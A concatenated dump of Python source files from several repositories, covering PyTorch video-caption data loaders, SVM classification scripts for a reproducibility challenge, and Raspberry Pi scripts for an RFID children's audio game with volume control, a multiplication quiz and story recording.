cost_im = scores.clamp(min=0)
cost_im = cost_im.masked_fill_(Imatch, 0)
match_im = scores.clamp(min=0)
match_im = match_im.masked_fill_(Icost, 0)
#elif self.neg_sampling == 'progressive':
# raise NotImplementedError
#elif self.neg_sampling == 'random':
# raise NotImplementedError
# Sum up and return
if cost_s is None:
cost_s = Variable(torch.zeros(1), requires_grad = True).cuda()
if match_s is None:
match_s = Variable(torch.zeros(1), requires_grad = True).cuda()
if cost_im is None:
cost_im = Variable(torch.zeros(1), requires_grad = True).cuda()
if match_im is None:
match_im = Variable(torch.zeros(1), requires_grad = True).cuda()
#MIL-NCE loss
if self.cost_style == 'sum':
neg_score = cost_s.sum()+cost_im.sum()
pos_score = match_s.sum() + match_im.sum()
else:
neg_score = cost_s.mean()+cost_im.mean()
pos_score = match_s.mean() + match_im.mean()
loss = torch.log(neg_score /(pos_score+neg_score))
return loss, pos_score, neg_score
```
#### File: Design_Project/util/combine_features.py
```python
import os
import sys
import logging
from basic.constant import ROOT_PATH
from basic.generic_utils import Progbar
from basic.bigfile import BigFile
logger = logging.getLogger(__file__)
logging.basicConfig(
format="[%(asctime)s - %(filename)s:line %(lineno)s] %(message)s",
datefmt='%d %b %H:%M:%S')
logger.setLevel(logging.INFO)
def process(options, collection, featname, sub_collections, set_style):
rootpath = options.rootpath
target_feat_dir = os.path.join(rootpath, collection, 'FeatureData', featname)
target_img_file = os.path.join(rootpath, collection, set_style, collection+'.txt')
if os.path.exists(target_feat_dir):
if options.overwrite:
logger.info('%s exists! overwrite.', target_feat_dir)
else:
logger.info('%s exists! quit.', target_feat_dir)
sys.exit(0)
else:
os.makedirs(target_feat_dir)
target_feat_file = os.path.join(target_feat_dir, 'id.feature.txt')
target_id_file = os.path.join(target_feat_dir, 'id.txt')
sub_collections = sub_collections.split('@')
img_ids = []
with open(target_feat_file, 'w') as fw_feat, open(target_id_file, 'w') as fw_id:
for collect in sub_collections:
feat_dir = os.path.join(rootpath, collect, 'FeatureData', featname)
featfile = BigFile(feat_dir)
print(">>> Process %s" % collect)
progbar = Progbar(len(featfile.names))
for name in featfile.names:
feat = featfile.read_one(name)
fw_feat.write('%s %s\n' % (name, ' '.join(['%g'%x for x in feat])))
progbar.add(1)
img_ids.extend(featfile.names)
fw_id.write(' '.join(img_ids))
if os.path.exists(target_img_file):
logger.info('%s exists! quit.', target_img_file)
return 0
else:
if not os.path.exists(os.path.dirname(target_img_file)):
os.makedirs(os.path.dirname(target_img_file))
with open(target_img_file, 'w') as fw_img:
fw_img.write('\n'.join(img_ids) + '\n')
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
from optparse import OptionParser
parser = OptionParser(usage="""usage: %prog [options] collection featname sub_collections set_style""")
parser.add_option("--rootpath", default=ROOT_PATH, type="string", help="rootpath (default: %s)" % ROOT_PATH)
parser.add_option("--overwrite", default=0, type="int", help="overwrite existing file (default=0)")
(options, args) = parser.parse_args(argv)
if len(args) < 4:
parser.print_help()
return 1
return process(options, args[0], args[1], args[2], args[3])
if __name__ == '__main__':
sys.exit(main())
```
#### File: Design_Project/util/data_provider.py
```python
import torch
import torch.utils.data as data
import numpy as np
import json as jsonmod
from basic.util import getVideoId
from vocab import clean_str
import pickle
import os
import torch._utils
import torch
import io
#Tempuckey starts============================
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
SAVE_PATH = '.\\feature\\'
SSP = '/usr/local/extstore01/zhouhan/Tempuckey/feature_somewhere'
VIDEO_MAX_LEN = 100
#Tempuckey ends============================
#VIDEO_MAX_LEN=64
def read_video_ids(cap_file):
video_ids_list = []
with open(cap_file, 'r') as cap_reader:
for line in cap_reader.readlines():
if len(line.strip().split(' ')) < 2:
continue
cap_id, caption = line.strip().split(' ', 1)
video_id = getVideoId(cap_id)
if video_id not in video_ids_list:
video_ids_list.append(video_id)
return video_ids_list
def collate_frame_gru_fn(data):
"""
Build mini-batch tensors from a list of (video, caption) tuples.
"""
# Sort a data list by caption length
if data[0][1] is not None:
data.sort(key=lambda x: len(x[1]), reverse=True)
videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data)
# Merge videos (convert tuple of 1D tensor to 4D tensor)
video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos]
frame_vec_len = len(videos[0][0])
vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len)
videos_origin = torch.zeros(len(videos), frame_vec_len)
vidoes_mask = torch.zeros(len(videos), max(video_lengths))
for i, frames in enumerate(videos):
end = video_lengths[i]
vidoes[i, :end, :] = frames[:end,:]
videos_origin[i,:] = torch.mean(frames,0)
vidoes_mask[i,:end] = 1.0
if captions[0] is not None:
# Merge captions (convert tuple of 1D tensor to 2D tensor)
lengths = [len(cap) for cap in captions]
target = torch.zeros(len(captions), max(lengths)).long()
words_mask = torch.zeros(len(captions), max(lengths))
for i, cap in enumerate(captions):
end = lengths[i]
target[i, :end] = cap[:end]
words_mask[i, :end] = 1.0
else:
target = None
lengths = None
words_mask = None
cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None
video_data = (vidoes, videos_origin, video_lengths, vidoes_mask)
text_data = (target, cap_bows, lengths, words_mask)
return video_data, text_data, idxs, cap_ids, video_ids
def collate_frame(data):
videos, idxs, video_ids = zip(*data)
# Merge videos (convert tuple of 1D tensor to 4D tensor)
video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos]
frame_vec_len = len(videos[0][0])
vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len)
videos_origin = torch.zeros(len(videos), frame_vec_len)
vidoes_mask = torch.zeros(len(videos), max(video_lengths))
for i, frames in enumerate(videos):
end = video_lengths[i]
vidoes[i, :end, :] = frames[:end,:]
videos_origin[i,:] = torch.mean(frames,0)
vidoes_mask[i,:end] = 1.0
video_data = (vidoes, videos_origin, video_lengths, vidoes_mask)
return video_data, idxs, video_ids
def collate_text(data):
if data[0][0] is not None:
data.sort(key=lambda x: len(x[0]), reverse=True)
captions, cap_bows, idxs, cap_ids = zip(*data)
if captions[0] is not None:
# Merge captions (convert tuple of 1D tensor to 2D tensor)
lengths = [len(cap) for cap in captions]
target = torch.zeros(len(captions), max(lengths)).long()
words_mask = torch.zeros(len(captions), max(lengths))
for i, cap in enumerate(captions):
end = lengths[i]
target[i, :end] = cap[:end]
words_mask[i, :end] = 1.0
else:
target = None
lengths = None
words_mask = None
cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None
text_data = (target, cap_bows, lengths, words_mask)
return text_data, idxs, cap_ids
class Dataset4DualEncoding(data.Dataset):
"""
Load captions and video frame features by pre-trained CNN model.
"""
def __init__(self, cap_file, visual_feat, bow2vec, vocab, n_caption=None, video2frames=None):
# Captions
self.captions = {}
self.cap_ids = []
self.video_ids = set()
self.video2frames = video2frames
with open(cap_file, 'r') as cap_reader:
for line in cap_reader.readlines():
if len(line.strip().split(' ')) < 2:
continue
cap_id, caption = line.strip().split(' ', 1)
video_id = getVideoId(cap_id)
self.captions[cap_id] = caption
self.cap_ids.append(cap_id)
self.video_ids.add(video_id)
self.visual_feat = visual_feat
self.bow2vec = bow2vec
self.vocab = vocab
self.length = len(self.cap_ids)
# if n_caption is not None:
# assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length)
def __getitem__(self, index):
cap_id = self.cap_ids[index]
video_id = getVideoId(cap_id)
# video
frame_list = self.video2frames[video_id]
frame_vecs = []
for frame_id in frame_list:
frame_vecs.append(self.visual_feat.read_one(frame_id))
frames_tensor = torch.Tensor(frame_vecs)
# text
caption = self.captions[cap_id]
if self.bow2vec is not None:
cap_bow = self.bow2vec.mapping(caption)
if cap_bow is None:
cap_bow = torch.zeros(self.bow2vec.ndims)
else:
cap_bow = torch.Tensor(cap_bow)
else:
cap_bow = None
if self.vocab is not None:
tokens = clean_str(caption)
caption = []
caption.append(self.vocab('<start>'))
caption.extend([self.vocab(token) for token in tokens])
caption.append(self.vocab('<end>'))
cap_tensor = torch.Tensor(caption)
else:
cap_tensor = None
return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id
def __len__(self):
return self.length
class VisDataSet4DualEncoding(data.Dataset):
"""
Load video frame features by pre-trained CNN model.
"""
def __init__(self, visual_feat, video2frames=None, video_ids=None):
self.visual_feat = visual_feat
self.video2frames = video2frames
if video_ids is None:
self.video_ids = video2frames.keys()
else:
self.video_ids = video_ids
self.length = len(self.video_ids)
def __getitem__(self, index):
video_id = self.video_ids[index]
frame_list = self.video2frames[video_id]
frame_vecs = []
for frame_id in frame_list:
frame_vecs.append(self.visual_feat.read_one(frame_id))
frames_tensor = torch.Tensor(frame_vecs)
return frames_tensor, index, video_id
def __len__(self):
return self.length
class TxtDataSet4DualEncoding(data.Dataset):
"""
Load captions
"""
def __init__(self, cap_file, bow2vec, vocab):
# Captions
self.captions = {}
self.cap_ids = []
with open(cap_file, 'r') as cap_reader:
for line in cap_reader.readlines():
if len(line.strip().split(' ')) < 2:
continue
cap_id, caption = line.strip().split(' ', 1)
self.captions[cap_id] = caption
self.cap_ids.append(cap_id)
self.bow2vec = bow2vec
self.vocab = vocab
self.length = len(self.cap_ids)
def __getitem__(self, index):
cap_id = self.cap_ids[index]
caption = self.captions[cap_id]
if self.bow2vec is not None:
cap_bow = self.bow2vec.mapping(caption)
if cap_bow is None:
cap_bow = torch.zeros(self.bow2vec.ndims)
else:
cap_bow = torch.Tensor(cap_bow)
else:
cap_bow = None
if self.vocab is not None:
tokens = clean_str(caption)
caption = []
caption.append(self.vocab('<start>'))
caption.extend([self.vocab(token) for token in tokens])
caption.append(self.vocab('<end>'))
cap_tensor = torch.Tensor(caption)
else:
cap_tensor = None
return cap_tensor, cap_bow, index, cap_id
def __len__(self):
return self.length
def get_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=1, n_caption=2, video2frames=None, padding_size=0):
"""
Returns torch.utils.data.DataLoader for train and validation datasets
Args:
cap_files: caption files (dict) keys: [train, val]
visual_feats: image feats (dict) keys: [train, val]
"""
dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train']),
'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']) }
data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x],
batch_size=batch_size,
shuffle=(x=='train'),
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame_gru_fn)
for x in cap_files }
return data_loaders
def get_train_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=1, n_caption=2, video2frames=None):
"""
Returns torch.utils.data.DataLoader for train and validation datasets
Args:
cap_files: caption files (dict) keys: [train, val]
visual_feats: image feats (dict) keys: [train, val]
"""
dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'])}
data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x],
batch_size=batch_size,
shuffle=(x=='train'),
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame_gru_fn)
for x in cap_files if x=='train' }
return data_loaders
def get_test_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=1, n_caption=2, video2frames = None):
"""
Returns torch.utils.data.DataLoader for test dataset
Args:
cap_files: caption files (dict) keys: [test]
visual_feats: image feats (dict) keys: [test]
"""
dset = {'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames = video2frames['test'])}
data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x],
batch_size=batch_size,
shuffle=False,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame_gru_fn)
for x in cap_files }
return data_loaders
def get_vis_data_loader(vis_feat, batch_size=100, num_workers=1, video2frames=None, video_ids=None):
dset = VisDataSet4DualEncoding(vis_feat, video2frames, video_ids=video_ids)
data_loader = torch.utils.data.DataLoader(dataset=dset,
batch_size=batch_size,
shuffle=False,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame)
return data_loader
def get_txt_data_loader(cap_file, vocab, bow2vec, batch_size=100, num_workers=1):
dset = TxtDataSet4DualEncoding(cap_file, bow2vec, vocab)
data_loader = torch.utils.data.DataLoader(dataset=dset,
batch_size=batch_size,
shuffle=False,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_text)
return data_loader
#Tempuckey starts============================
def collate(data):
# Sort a data list by caption length
# if data[0][1] is not None:
# data.sort(key=lambda x: len(x[1]), reverse=True)
# videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data)
videos, video_infos, captions, caption_lengths = zip(*data)
# Merge videos (convert tuple of 1D tensor to 4D tensor)
frame_vec_len = len(videos[0][0][0])
video_lengths = [min(VIDEO_MAX_LEN, len(frame)) for frame in videos]
video_datas = torch.zeros(len(videos), max(video_lengths), frame_vec_len)
video_means = torch.zeros(len(videos), frame_vec_len)
video_masks = torch.zeros(len(videos), max(video_lengths))
video_names = [info['video_name'] for info in video_infos]
for i, video in enumerate(videos):
end = video_lengths[i]
video = [v[0] for v in video]
video = torch.stack(video)
video_datas[i, :end, :] = video[:end, :]
video_means[i, :] = torch.mean(video, 0)
video_masks[i, :end] = 1.0
# Merge captions (convert tuple of 1D tensor to 2D tensor)
cap_lengths = [len(cap) for cap in captions]
cap_datas = torch.zeros(len(captions), max(cap_lengths)).long()
cap_masks = torch.zeros(len(captions), max(cap_lengths))
for i, cap in enumerate(captions):
end = cap_lengths[i]
cap_datas[i, :end] = cap[:end]
cap_masks[i, :end] = 1.0
#cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None
#TODO: bow2vec
cap_bows = None
video_data_pack = (video_datas,
video_means,
video_lengths,
video_masks,
video_names)
text_data_pack = (cap_datas,
cap_bows,
cap_lengths,
cap_masks)
return video_data_pack, text_data_pack
"""
A class to solve unpickling issues
"""
class CPU_Unpickler(pickle.Unpickler,object):
def find_class(self, module, name):
if module == 'torch.storage' and name == '_load_from_bytes':
return lambda b: torch.load(io.BytesIO(b), map_location='cpu')
else: return super(CPU_Unpickler,self).find_class(module, name)
print (type(CPU_Unpickler))
class TempuckeyDataSet(data.Dataset):
def __init__(self, read_path=SSP):
self.read_path = read_path
_, _, self.file_pool = next(os.walk(read_path))
self.length = len(self.file_pool)
print 'Initializing TempuckeyDataSet...'
print 'Read path: %s' % self.read_path
print 'Find %d files in the path.' % self.length
def __getitem__(self, index):
file_path = os.path.join(self.read_path, self.file_pool[index])
with open(file_path, 'rb') as f:
file = CPU_Unpickler(f).load()
video = file['feature']
video_info = file['video_info']
caption = (file['captions'])
caption_length = np.count_nonzero(caption == 1.0)
return video, video_info, caption, caption_length
def __len__(self):
return self.length
def get_tempuckey_data_loader(batch_size=10, num_workers=1):
"""
Returns torch.utils.data.DataLoader for train and validation datasets
Args:
cap_files: caption files (dict) keys: [train, val]
visual_feats: image feats (dict) keys: [train, val]
:param num_workers:
:param batch_size:
"""
data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),
batch_size=batch_size,
shuffle=True,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate)
return data_loader
#Tempuckey ends============================
if __name__ == '__main__':
pass
```
#### File: Design_Project/util/format_check.py
```python
import os
import sys
from basic.constant import ROOT_PATH
def process(opt):
rootpath = opt.rootpath
collection = opt.collection
feature = opt.feature
flag=0
feat_dir = os.path.join(rootpath, collection, 'FeatureData', feature)
if not os.path.exists(os.path.join(feat_dir, 'feature.bin')):
print "file %s is not exits" % os.path.join(feat_dir, 'feature.bin')
flag=1
if not os.path.exists(os.path.join(feat_dir, 'id.txt')):
print "file %s is not exits" % os.path.join(feat_dir, 'id.txt')
flag=1
if not os.path.exists(os.path.join(feat_dir, 'shape.txt')):
print "file %s is not exits" % os.path.join(feat_dir, 'shape.txt')
flag=1
textfile = feat_dir = os.path.join(rootpath, collection, 'TextData', '%s.caption.txt' % collection)
if not os.path.exists(textfile):
print "file %s is not exits" % textfile
flag=1
if flag == 0:
print "%s format check pass!" % collection
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
from optparse import OptionParser
parser = OptionParser(usage="""usage: %prog [options]""")
parser.add_option("--rootpath", default=ROOT_PATH, type="string", help="rootpath (default: %s)" % ROOT_PATH)
parser.add_option("--collection", default="", type="string", help="collection name")
parser.add_option("--feature", default="", type="string", help="feature name")
(options, args) = parser.parse_args(argv)
return process(options)
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "JimShu716/NeurIPS-2019-Reproducibility-Challenge",
"score": 3
} |
#### File: JimShu716/NeurIPS-2019-Reproducibility-Challenge/dataprocess.py
```python
import pandas as pd
import numpy as np
import math
import csv
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
get_name = 'cancer.DATA'
gen_name = 'cancer_raw'
dp = np.genfromtxt('./raw data/'+get_name,delimiter='\t')
test_size = 60
xtrain = pd.DataFrame(dp[test_size: ,:-1])
xtest = pd.DataFrame(dp[:test_size ,:-1])
ytrain = pd.DataFrame(dp[test_size: ,-1 ])
ytest = pd.DataFrame(dp[:test_size ,-1 ])
xtrain .to_csv('./raw data/'+gen_name+'.csv' ,sep=',',index=False,header=False)
xtest .to_csv('./raw data/'+gen_name+'_test.csv' ,sep=',',index=False,header=False)
ytrain .to_csv('./raw data/'+gen_name+'_label.csv' ,sep=',',index=False,header=False)
ytest .to_csv('./raw data/'+gen_name+'_label_test.csv' ,sep=',',index=False,header=False)
def acc(y_test,y_pred):
return "-----Accuracy: "+str((y_test==y_pred).sum()/len(y_test))
def runsvmpred(data_name):
X_train = np.genfromtxt('./raw data/'+data_name+'.csv' ,delimiter=',')
y_train = np.genfromtxt('./raw data/'+data_name+'_label.csv' ,delimiter=',')
X_test = np.genfromtxt('./raw data/'+data_name+'_test.csv' ,delimiter=',')
y_test = np.genfromtxt('./raw data/'+data_name+'_label_test.csv',delimiter=',')
svclassifier = SVC(kernel='linear')
svclassifier.fit(X_train, y_train)
y_pred = svclassifier.predict(X_test)
#print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
print(acc(y_test,y_pred))
runsvmpred('iris_raw')
```
#### File: JimShu716/NeurIPS-2019-Reproducibility-Challenge/nlp_kernel.py
```python
from sklearn.pipeline import Pipeline
import time
import csv
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import string
from tqdm import tqdm
from numpy import transpose as T
from scipy.stats import stats
from scipy.stats import mode
from sklearn.model_selection import cross_validate
from nltk.stem import WordNetLemmatizer
from nltk import word_tokenize
import re
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
#import models
from sklearn.svm import LinearSVC
def encode_subreddit(argument):
switch = {
"europe":0,
"canada":1,
}
return switch.get(argument,2)
def averageAcc(cv_results,fold):
average = 0
for number in cv_results:
average+=number
average /= fold
print("Cross-validate",fold,"folds accuracy is:",average)
return average
def accuracy(predicted,true_outcome,num):
accuracy = 0
index = 0
for result in predicted:
if result == true_outcome[index]:
accuracy+=1
index+=1
print("-----Accuracy:", accuracy/num)
class LemmaTokenizer(object):
def __init__(self):
self.wnl = WordNetLemmatizer()
def __call__(self, articles):
return [self.wnl.lemmatize(t) for t in re.split('\d|\\\|\s|[,.;:?!]|[/()]|\*',articles)]
start_time = time.time()
#load file
#------------------------------------------------------------------------------
canada_df = pd.read_csv(r'../data/parsed_data/canada.csv')
europe_df = pd.read_csv(r'../data/parsed_data/europe.csv')
training_df = canada_df.append(europe_df)
finish_time = time.time()
print("-----File Loaded in {} sec".format(finish_time - start_time))
encode = []
for subreddit in training_df['subreddits']:
encode.append(encode_subreddit(subreddit))
training_df['subreddit_encoding'] = encode
#training_df.to_csv(r'../data/encoded_reddit_train.csv',',')
# 6.1 SVM
#------------------------------------------------------------------------------
svm_train_clf= Pipeline([
('vect',CountVectorizer(binary = True)),
('tfidf',TfidfTransformer()),
('clf', LinearSVC(C = 0.2)),
])
#Cross-validation
#------------------------------------------------------------------------------
svm_cv_results = cross_validate(svm_train_clf,training_df['comments'],training_df['subreddit_encoding'],cv = 7)
sorted(svm_cv_results.keys())
svm_cv_results['fit_time']
svm_cv_results['test_score']
print("SVM")
averageAcc(svm_cv_results['test_score'],7)
``` |
{
"source": "jimsio/hoorch",
"score": 2
} |
#### File: jimsio/hoorch/adjust_volume.py
```python
import RPi.GPIO as GPIO
import os
import subprocess
from shlex import split
print("starting adjust volume")
#set start value of audio output
#os.system("amixer -q -c 0 sset 'Headphone',0 82%") #=48 in alsamixer
os.system("amixer -q -c 0 sset 'Headphone',0 96%") #=85 in alsamixer - for redamp
vol_up_pin = 36 # volume up
vol_down_pin = 38 # volume down
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
#new hoorch v4 mic+amp
#GPIO.setmode(GPIO.BCM)
#vol_up_pin = 2
#vol_down_pin = 3
GPIO.setup(vol_up_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(vol_down_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
cmd = "amixer -c 0 sget 'Headphone',0"
cmd = split(cmd)
def volume_up(pin):
get_volume = subprocess.run(cmd, stdout=subprocess.PIPE).stdout.decode('utf-8')
position = get_volume.find("%")
cv = int(get_volume[position-2:position].replace("[", ""))
print(cv)
#if cv <= 82:
if cv <= 96: # for redamp
print("volume up")
os.system("amixer -q -c 0 sset 'Headphone',0 5db+")
def volume_down(pin):
print("volume down")
os.system("amixer -q -c 0 sset 'Headphone',0 5db-")
GPIO.add_event_detect(vol_up_pin, GPIO.FALLING, callback=volume_up, bouncetime = 400)
GPIO.add_event_detect(vol_down_pin, GPIO.FALLING, callback=volume_down, bouncetime = 400)
while True:
continue
```
#### File: jimsio/hoorch/einmaleins.py
```python
import audio
import time
import rfidreaders
import leds
import random
import copy
import threading
import re
import sys
defined_figures = rfidreaders.gamer_figures
#end_timer = None
'''def check_end():
if "ENDE" in rfidreaders.tags:
print("sys.exit")
end_timer.cancel()
sys.exit("End game")
end_timer = threading.Timer(0.3,check_end).start()
'''
def start():
#check_end()
audio.play_full("TTS",85) #Wir üben jetzt das Einmaleins.
leds.reset() #reset leds
audio.play_full("TTS",86) #Es können drei Figuren mitspielen. Stellt eure Figuren auf die Felder 1, 3 oder 5, wo die Lämpchen leuchten.
leds.led_value = [1,0,1,0,1,0]
audio.play_file("sounds","waiting.mp3") # play wait sound
time.sleep(6)
#check for figures on board, filter other tags
players = copy.deepcopy(rfidreaders.tags)
players[1] = None
players[3] = None
players[5] = None
for i,p in enumerate(players):
if p not in defined_figures:
players[i] = None
figure_count = sum(x is not None for x in players)
time.sleep(1)
if figure_count is 0:
audio.play_full("TTS",59) #Du hast keine Spielfigure auf das Spielfeld gestellt.
return
audio.play_full("TTS",5+figure_count) # Es spielen x Figuren mit
if "ENDE" in rfidreaders.tags:
return
rounds = 3 # 1-5 rounds possible
audio.play_full("TTS",20+rounds) #Wir spielen 1-5 Runden
points = [0,0,0,0,0,0]
if "ENDE" in rfidreaders.tags:
return
isthefirst = True
for r in range(0,rounds):
#print(players)
for i,p in enumerate(players):
if p is not None:
leds.reset()
leds.led_value[i] = 100
if r == 0 and isthefirst == True: #first round
isthefirst = False
if figure_count > 1:
audio.play_full("TTS",12+i) #Es beginnt die Spielfigur auf Spielfeld x
audio.play_full("TTS",89) #Stelle die Zehnerstelle links neben deine Figur und die Einerstelle rechts, wo die Lämpchen leuchten.
elif figure_count == 1:
audio.play_full("TTS",67) # Du bist nochmal dran
else:
audio.play_full("TTS",48+i) # Die nächste Spielfigur steht auf Spielfeld x
if "ENDE" in rfidreaders.tags:
return
num1 = random.randint(1,9)
num2 = random.randint(1,9)
solution = num1 * num2
audio.play_full("TTS",87) #Wieviel ist
audio.play_full("TTS",90+num1)
audio.play_full("TTS",88) #mal
audio.play_full("TTS",90+num2)
ud = 0
#for unit digit
if i == 0:
ud = 5
else:
ud = i-1
#illuminate the led after and before the player field
leds.led_value[ud] = 100
leds.led_value[i+1] = 100
if "ENDE" in rfidreaders.tags:
return
audio.play_full("TTS",190) #Du hast für die Antwort 10 Sekunden Zeit
#blink / wait for 10 seconds
#for b in range(1):
if r == 0: #only play in the first round
audio.play_file("sounds","waiting.mp3") # play wait sound 6 sec
#leds.rotate_one_round(1.11)
#leds blink at tens and unit fields
for k in range(5):
leds.led_value[i+1] = 0
leds.led_value[ud] = 100
time.sleep(1)
leds.led_value[ud] = 0
leds.led_value[i+1] = 100
time.sleep(1)
if "ENDE" in rfidreaders.tags:
return
tens = copy.deepcopy(rfidreaders.tags[i+1]) #zehnerstelle
unit = copy.deepcopy(rfidreaders.tags[ud]) #Einerstelle
if tens == None:
tens = "0"
#regex (start with capital character, zero or more characters, end with single digit) : ^[A-z]*[0-9]$
#search with regex if unit and tens look like Hahn1
if unit != None and re.search("^[A-z]*[0-9]$", unit) and re.search("^[A-z]*[0-9]$", tens):
#extract the digit from string (i.e. 1 from Hahn1)
tens_digit = int(tens[-1])*10
#old: tens_digit = int(tens)*10
#old: unit_digit = int(unit)
unit_digit = int(unit[-1])
if tens_digit+unit_digit == solution:
audio.play_full("TTS",27) # richtig
#audio.play_file("sounds","winner.mp3")
time.sleep(0.5)
points[i] += 1
print("Du hast schon "+str(points[i])+" richtige Antworten")
else:
audio.play_full("TTS",26) # falsch
#audio.play_file("sounds","loser.mp3")
time.sleep(0.5)
else:
audio.play_full("TTS",191) #Du hast keine Zahlen hingestellt
if "ENDE" in rfidreaders.tags:
return
# tell the points
audio.play_full("TTS",80) #Ich verlese jetzt die Punkte
for i, p in enumerate(players):
if p is not None:
leds.reset()
leds.led_value[i] = 100
audio.play_full("TTS",74+i) #Spielfigur auf Spielfeld 1,2...6
time.sleep(0.2)
print("Du hast "+str(points[i])+" Antworten richtig")
audio.play_full("TTS",68+points[i])
time.sleep(1)
if "ENDE" in rfidreaders.tags:
return
leds.reset()
```
#### File: jimsio/hoorch/geschichten_aufnehmen.py
```python
import audio
import time
import datetime
import rfidreaders
import leds
import os
import random
import copy
import subprocess
defined_figures = rfidreaders.gamer_figures
def start():
audio.play_full("TTS",55) #Wir nehmen eine Geschichte für deine Figur auf
print("Wir nehmen eine Geschichte für deine Figur auf")
leds.reset() #reset leds
audio.play_full("TTS",5) #Stelle deine Figur auf eines der Spielfelder
audio.play_file("sounds","waiting.mp3") # play wait sound
leds.rotate_one_round(1.11)
players = copy.deepcopy(rfidreaders.tags)
#check if player tag is predefined in definded_tags xor is number (than it's an unknown tag)
for i,p in enumerate(players):
if p not in defined_figures:
players[i] = None
figure_count = sum(x is not None for x in players)
if figure_count is 0:
audio.play_full("TTS",59) #"Du hast keine Spielfigure auf das Spielfeld gestellt."
return
time.sleep(1)
audio.play_full("TTS",5+figure_count) # Es spielen x Figuren mit
if "ENDE" in rfidreaders.tags:
return
start = True
for i, figure_id in enumerate(players):
leds.reset()
if figure_id is not None:
leds.led_value[i] = 100
new_recording = False
error_recording = False
if figure_count > 1:
if start: #at start
audio.play_full("TTS",12+i) #Es beginnt die Spielfigur auf Spielfeld x
start = False
else:
audio.play_full("TTS",47+i) # Die nächste Spielfigur steht auf Spielfeld x
if "ENDE" in rfidreaders.tags:
return
recordings_list = os.listdir("./data/figures/")
figure_dir = "./data/figures/"+figure_id
#when figure folder and i.e. roboter.mp3 exist
if figure_id in recordings_list and figure_id+'.mp3' in os.listdir(figure_dir):
audio.play_full("TTS",84) #Diese Figur hat schon eine Geschichte gespeichert...
#files = os.listdir(figure_dir)
audio.play_story(figure_id)
#wait 60 seconds longer than recording otherwise continue to next figure - prevent program from freezing
waitingtime = time.time() + float(subprocess.run(['soxi','-D',figure_dir+'/'+figure_id+'.mp3'], stdout=subprocess.PIPE).stdout.decode('utf-8'))+60
while waitingtime > time.time():
if "JA" in rfidreaders.tags:
#if rfidreaders.tags[i] == "JA":
audio.kill_sounds()
audio.play_full("TTS",200) #Stelle deine Figur wieder auf dein Spielfeld.
#rename old story
archived_file = figure_id+datetime.datetime.now().strftime("%Y-%m-%d-%H-%M")
os.rename(figure_dir+"/"+figure_id+".mp3",figure_dir+"/"+archived_file+".mp3")
audio.play_full("TTS",56) #Die Aufnahme beginnt in 3 Sekunden! Wenn du fertig bist, nimm deine Spielfigur vom Spielfeld"
#leds.rotate_one_round(0.4)
audio.play_full("TTS",66) # 3 2 1 Los
leds.led_value[i] = 100
#most recent story has only figure_id as filename, record_story(figure_id)
audio.record_story(figure_id)
record_timer = time.time()+600 #600 sekunden(60*10min) counter until stop
while True:
if rfidreaders.tags[i] is None or record_timer < time.time() or "ENDE" in rfidreaders.tags:
error_recording = audio.stop_recording(figure_id)
audio.play_full("TTS",57) #Aufnahme ist zu Ende
new_recording = True
break
break
#elif rfidreaders.tags[i] == "NEIN" or "ENDE" in rfidreaders.tags:
elif "NEIN" in rfidreaders.tags or "ENDE" in rfidreaders.tags:
audio.kill_sounds()
#new_recording = False
break
else:
print("no story recorded yet")
if figure_id not in recordings_list:
os.mkdir(figure_dir)
audio.play_full("TTS",56) #Die Aufnahme beginnt in 3 Sekunden! Wenn du fertig bist, nimm deine Spielfigur vom Spielfeld"
#leds.rotate_one_round(0.4)
audio.play_full("TTS",66) # 3 2 1 Los
#time.sleep(1)
leds.led_value[i] = 100
#most recent story has only figure_id as filename, record_story(figure_id)
audio.record_story(figure_id)
record_timer = time.time()+600 #600 sekunden(=10min) counter until stop
